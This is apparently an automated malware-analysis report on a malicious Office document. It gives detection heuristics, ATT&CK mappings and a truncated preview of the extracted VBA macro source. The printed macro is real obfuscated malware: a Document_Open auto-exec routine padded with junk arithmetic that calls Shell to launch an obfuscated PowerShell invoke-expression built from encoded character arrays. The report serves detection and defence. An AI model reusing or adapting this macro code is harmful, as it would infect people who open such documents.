MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' confirms this auto-executes via Document_open. The VBA script, though obfuscated, ultimately calls the Shell function, likely to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6992228-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6992228-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16463 bytes |
SHA-256: dd06edeab4a909b5bd98eb6823995d247c65d51ce07f20cd63e3b207c5b15e5f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KminClzMiQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function WZuCNhuthG() On Error Resume Next psiNt = 63777 + NGsQr + (67143 * CDbl(WoRaKs) - PFKLD / CSng(21159) - YjoSX / Hex(YIwnj) + 85827 - 58550) hrSVAa = XCpWho - EzTSX / 26126 / duROiC - 223327908 + Hex(ASzRc) * zwACQw - Round(40570) NuKtGt = Sqr(85326) zTnblp = ORwSdO DzAHVX = 55351 + jrEFt + (50616 * CDbl(zRBZs) - sCvRh / CSng(28786) - msJvw / Hex(wwzuv) + 52236 - 85219) QHmzmR = uFpnI - kriJG / 66971 / JzXGzA - 223327908 + Hex(rDdai) * nWkWw - Round(22775) BzRrD = Sqr(25662) lrWwz = pNZoWi YSkjzm = 99557 + rbOJG + (39804 * CDbl(GMLvp) - FCRzfP / CSng(864) - mVqJSO / Hex(ApzZt) + 36669 - 23142) wpfqS = ShTWz - EFYAoF / 19399 / XMVvZ - 223327908 + Hex(jbBTzz) * iZAicw - Round(75888) qzLPD = Sqr(5801) lDuFHS = RJQHkU jkUjQY = 63133 + fAWCFW + (62192 * CDbl(VMJWY) - hSBqm / CSng(42064) - EvqDi / Hex(pjvLX) + 12761 - 80241) LAWXSC = halKi - FjwWUr / 83813 / BmPjmC - 223327908 + Hex(JNCoQc) * phKjmi - Round(25986) ijsdkh = Sqr(87501) IfDuiH = RzXJt WZuCNhuthG = mBouKHUsso + VBA.Shell(iwQMvkWh + Chr(VEjWrLu + vbKeyP + zvChqOko) + "owers" + SlbwbAtsJAH + QTwDkuG + vAmPdLwawi + pNqrTwQamT + PJYich + fAnBirzwsq, 49604 - 49604) GofAQ = 46082 + jWSwV + (82122 * CDbl(MlFMN) - AUbld / CSng(71588) - GmwOc / Hex(baWEm) + 27058 - 79903) uikonu = mMtWf - FzXEW / 91394 / qpjTw - 223327908 + Hex(rzumj) * bnMHN - Round(48288) BZpCE = Sqr(18179) lvHAZA = GPpBAK umEzR = 80984 + COraK + (93557 * CDbl(UtqJi) - QACjWD / CSng(31070) - YvtACR / Hex(BHJwiY) + 54261 - 1253) GwsukY = OZZiSw - HfWTl / 61849 / vIozF - 223327908 + Hex(Wkldzh) * uEZmR - Round(67851) iATfMZ = Sqr(26611) fOoJKP = hSDBlj End Function Private Sub Document_open() On Error Resume Next iKqEvi = 50947 + dowfl + (93493 * CDbl(DGjCCz) - mJqRGo / CSng(56257) - ckLzXk / Hex(VrmId) + 8793 - 38656) qlkzX = NdYlbj - LTlZu / 80313 / sQtUaS - 223327908 + Hex(XVDKn) * DtaPX - Round(24753) SwCip = Sqr(63880) iJzzhw = snItn vjZrPY = 8821 + pIUboR + (17275 * CDbl(tWBhJ) - iDWSCL / CSng(28395) - KbboT / Hex(TizzI) + 9631 - 33284) obBqR = WUzVt - QztAA / 94618 / wKWBZE - 223327908 + Hex(ZKbFw) * pUWzZ - Round(95875) svNGw = Sqr(48529) HNNWBX = rwKcj WZuCNhuthG JMbtS = 48668 + lFcMtr + (48801 * CDbl(XwbtaC) - PBwTXK / CSng(23050) - RLfsm / Hex(OaDazM) + 93880 - 87979) VKOza = wBRZsK - OznjI / 42780 / TdqwV - 223327908 + Hex(cJSbq) * lGKhX - Round(4549) UKEiVD = Sqr(61838) WzOCi = sAHwv ImsUPb = 18710 + ojpjk + (49369 * CDbl(DRPiUs) - uzDum / CSng(62406) - zAZda / Hex(USMHai) + 16966 - 32553) Xsoqr = QVodwr - PFJwZl / 9519 / DpkAE - 223327908 + Hex(AadqU) * zClmm - Round(55011) qCTJpC = Sqr(88382) dFYfmD = jGLRBM End Sub Attribute VB_Name = "vmlBKZHazJ" Function SlbwbAtsJAH() On Error Resume Next pHpiV = Cwwwq MibPd = Sqr(39379) iXHHQC = viwtd - dWsJSd / 9160 / GcFHih - 223327908 + Hex(nVVQho) * jAdQtU - Round(68411) qQkKNi = 69857 + fTHdAu + (97639 * CDbl(iRSTT) - AhGSwl / CSng(88041) - UdHHk / Hex(wZfMqO) + 53188 - 41923) ZNwEjOQ = "HeLL &( ([ST" + "ring]$" + "VErbosEPreFEre" + "nce)[1,3]+'" + "X'-jo" + "IN'') ( " + "((120," + " 61 ,31 ,53,4 " + ", 38 , 26 " rUwWWq = RzzPuY rDsmv = Sqr(30475) rwJRrd = HFJEM - QDwuBX / 24045 / aKWsFv - 223327908 + Hex(zJQcA) * BifjmB - Round(25254) CAlVLH = 25002 + dvKims + (60662 * CDbl(kkCbl) - IHLDCD / CSng(46805) - Stapz / Hex(iXJbRO) + 83437 - 6678) vaTiGlE = ",124, 97 , 12" + "4,50 , 57,4" + "3 , 113,51,62" + " , 54, 57 ,63 ," + " 40," + " 124" + ",46 , 61 ,5" + "0,56 ,51,49 , 1" + "03,120 ,42,58,1" + "7 ,4" WHJia = nGwkYD hSkjO = Sqr(80590) UCDfMi = KHhKO - MXOHij / 45640 / PBdii - 223327908 + Hex(fvuTSC) * LBtCYK - Round(38192) RlmYm = 64758 + HwsbMq + (28557 * CDbl(ROPVz) - ECNOi / CSng(512) - sLjEzi / Hex(ttHzTW) + 89228 - 50557) MTjQUji = "9, " + "30 ,9 ,124" + ",97, 124 " + ", 50 , 57, " + "43 , 11 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.